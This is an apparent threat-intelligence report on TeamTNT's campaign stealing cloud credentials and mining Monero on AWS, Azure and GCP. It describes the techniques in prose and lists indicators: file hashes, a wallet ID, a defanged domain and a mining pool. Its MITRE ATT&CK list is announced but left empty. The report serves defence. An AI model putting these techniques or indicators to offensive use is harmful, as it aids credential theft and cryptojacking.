In the ever-evolving landscape of cybersecurity, threat actors continue to innovate and adapt their methods to exploit new technologies and platforms. One such group, known as TeamTNT, has been actively targeting cloud platforms like Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP). This report provides a comprehensive analysis of TeamTNT’s cloud credential stealing campaign, drawing on information from multiple sources, including Dark Reading, Trend Micro, and Cado Security.

The TeamTNT campaign targeting Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Platform (GCP) for cloud-credential stealing and cryptomining has been active for several months. The campaign has expanded its capabilities to target exposed Docker services, and it is associated with the threat actor group TeamTNT, known for exploiting cloud misconfigurations and vulnerabilities.

The campaign uses a variety of techniques to steal cloud credentials and propagate the attack. These techniques include profiling systems, searching for credential files, and exfiltrating them. The scripts also collect environment variable details, likely to identify other valuable services on the system to target later.

The threat actor is now delivering a UPX-packed, Golang-based ELF binary that drops and executes another shell script for scanning a specified range and propagating to other vulnerable targets.

The following Indicators of Compromise (IOCs) have been identified:

  • SHA-256 hashes:
    • 9504b74906cf2c4aba515de463f20c02107a00575658e4637ac838278440d1ae (IRC bot)
    • 3139a85a18e42bf60ba65deb3d691b5c088a0fac2b80a4d05f17a68eac3d4882 (Script)
    • 595497c407795e0dbb562a4616fd877ce1eb2e86424672bac8003662e1fa07eb (config_background.json)
    • 61fdad6d9b149e8d4fc54a848a25219eb9f1364a58073c27eadde8f8298a9573 (main shell script)
  • Monero Wallet ID: 89sp1qMoognSAbJTprreTXXUv9RG1AJBRjZ3CFg4rn6afQ5hRuqxiWRivYNqZbnYKKdsH5pCiTffrZToSyzXRfMvSHx5Guq
  • Domains: hxxp://DonaldTrump[.]cc
  • Mining Pool: mine[.]c3pool[.]com:17777

The MITRE ATT&CK tactics associated with this campaign include:

The TeamTNT campaign represents a significant threat to cloud platforms, demonstrating the group’s ability to exploit vulnerabilities and misconfigurations in these environments. The campaign’s sophisticated techniques, including system profiling, credential file searching, and exfiltration, highlight the need for robust security measures and continuous monitoring of cloud environments.

The identified Indicators of Compromise (IOCs) and associated MITRE ATT&CK tactics provide valuable insights for threat detection and mitigation. It’s crucial for organizations to stay vigilant, regularly update their systems, and apply the principle of least privilege to minimize the potential damage of such attacks.

As threat actors continue to evolve their strategies, understanding and learning from campaigns like TeamTNT’s is essential for enhancing cybersecurity defenses and ensuring the safety of cloud environments.